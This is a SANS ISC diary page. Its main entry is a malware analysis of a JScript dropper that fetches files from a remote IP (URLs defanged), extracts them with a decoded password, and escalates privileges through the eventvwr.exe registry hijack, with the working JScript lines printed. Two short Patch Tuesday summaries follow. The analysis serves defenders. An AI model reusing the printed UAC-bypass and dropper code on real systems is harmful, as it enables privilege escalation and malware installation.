UAC Bypass in JScript Dropper

Published: 2016-12-13. Last Updated: 2016-12-14 19:46:25 UTC
by Xavier Mertens (Version: 1)
5 comment(s)

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.

The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • hxxp://45.58.49.54/7za.exe
  • hxxp://45.58.49.54/process.zip

The bad guy was lazy (or smart?) and did not implement complex encryption functions in his code. 7za.exe[1] is a clean file (42badc1d2f03a8b1e4875740d3d49336) used to extract two malicious PE files from the process.zip archive. This archive is protected by a password that is stored and obfuscated in the code. The obfuscation technique is simple: just based on strings of hexadecimal characters:

var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");

This can be easily decoded with Python:

>>> '6D696E617331303030'.decode('hex')
'minas1000'

The destination path is generated via multiple variables and is finally set to "C:\Users\[user]\AppData\Local\", "user" being the victim's login. The archive is unzipped in this directory:

C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a "feature" present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].

The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary ("ODASTATACOTSTAODHOOD" is the path to the malicious peprocess.exe):

var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.RegWrite ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

Once done, eventvwr.exe is started. It will read the registry and execute our sample which will run with high privileges:

var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\"+"eventvwr.exe";
AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");
AAOGAODYSCSTSOAOLHAC.Run(ZLGOZYLOLHONHTXTAOOR, 1, 1);

Let's wait for the malware to accomplish its bad stuff and remove the registry entry:

WScript.Sleep(60000);
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");

More information about this technique to bypass UAC is available on github.com[5] with a PoC script in Powershell.

If you receive interesting samples, feel free to share them! We always need fresh meat!

[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

5 comment(s)

December 2016 Patch Tuesday Brief and Updates

Published: 2016-12-13. Last Updated: 2016-12-13 20:45:41 UTC
by Richard Porter (Version: 2)
2 comment(s)

December Patch Tuesday ISC Link: https://isc.sans.edu/mspatchdays.html?viewday=2016-12-13

MS16-144

Woha, patch now on clients! Servers might need emergency procedures (depending upon internal governance). There are known exploits and anytime we read “Scripting Engine?” that just does not bode well, for Internet Explorer.

MS16-145

Another patch now for clients, scripting engines seem to not be getting a break here. Similar in nature it seems, Edge also has some vulnerabilities in memory handling that could possibly lead to code execution. Let’s patch those browsers!

MS16-146

Pictures, Images, JPGs oh my… Another reason to scramble, it seems the graphics engine is exploitable and again with known and reported exploits. This one is also a patch now for clients. Servers hopefully don’t browse the internet *cough cough* but should be patched according to internal critical governance, or in other words “Don’t forget your servers!”

 

MS16-147

Well, had to go look this one up *asks what Uniscribe is* and it had API + Scripting in the function description [1]. There are not any “know” or published exploits that we are aware of on this one, however the dreaded “Remote Code Execution” is in the bulletin, so patch…

MS16-148

Office 2007 – 2016, again, no published exploits that we are aware of, however a broad spectrum of Office suites on this one. The bulletins do include “Remote Code Execution” in the for some of this roll-up. Patch.. Interestingly this handler was met with requests to patch on his home systems J

MS16-149

This one is correcting crypto handling and preventing privilege escalation. Compared to the above this one might be able to take a back set temporarily. 

MS16-150

​More privilege escalation correction, this patch updates kernel handling. It looks like this one would need a specially crafted application local on the system, so a bit further down the attack cycle.

MS16-151

​Getting a sense of entitlement here as MS16-151 is another privilege escalation patch. Anytime 'drivers' are involved this handler always takes a deeper look, however again, it seems an attacker would need a specially crafted program to hit on this vulnerability.

MS16-152

Here we are presented with possible information disclosure from the kernel. Listed as important and no known or published exploits. Correcting the way the kernel handles memory objects is always a good thing in this handlers book.

MS16-153

Logging information disclosure but with an interesting nugget at the top of the brief? "In a local attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to bypass security measures on the affected system allowing further exploitation.[2]"

MS16-154

Patch for Adobe Flash, critical, flash is everywhere... so goes without saying but we will say it anyway "Patch as a critical update!"

MS16-155

Read up on this one, it is .Net related. Seems isolated to a specific version, 4.6.2, however limited to information disclosure. It should be noted that known exploits exist.

 

We will update this diary as issues or more information is sent in. If anyone experiences any issues patching, let us know! 

[1] https://msdn.microsoft.com/en-us/library/windows/desktop/dd374091(v=vs.85).aspx

​[2] https://technet.microsoft.com/en-us/library/security/MS16-153

 

Richard Porter

@packetalien, @packetmonk

--- ISC Handler on Duty

Keywords:
2 comment(s)

December 2016 Microsoft Patch Tuesday

Published: 2016-12-13. Last Updated: 2016-12-13 19:10:25 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

https://isc.sans.edu/mspatchdays.html?viewday=2016-12-13

== Update

Thank you to our reader who caught the incorrect link. We at the ISC do not have a time machine.  Summary out shortly.

 

~Richard

Keywords:
1 comment(s)
ISC Stormcast For Tuesday, December 13th 2016 https://isc.sans.edu/podcastdetail.html?id=5289

Comments


Diary Archives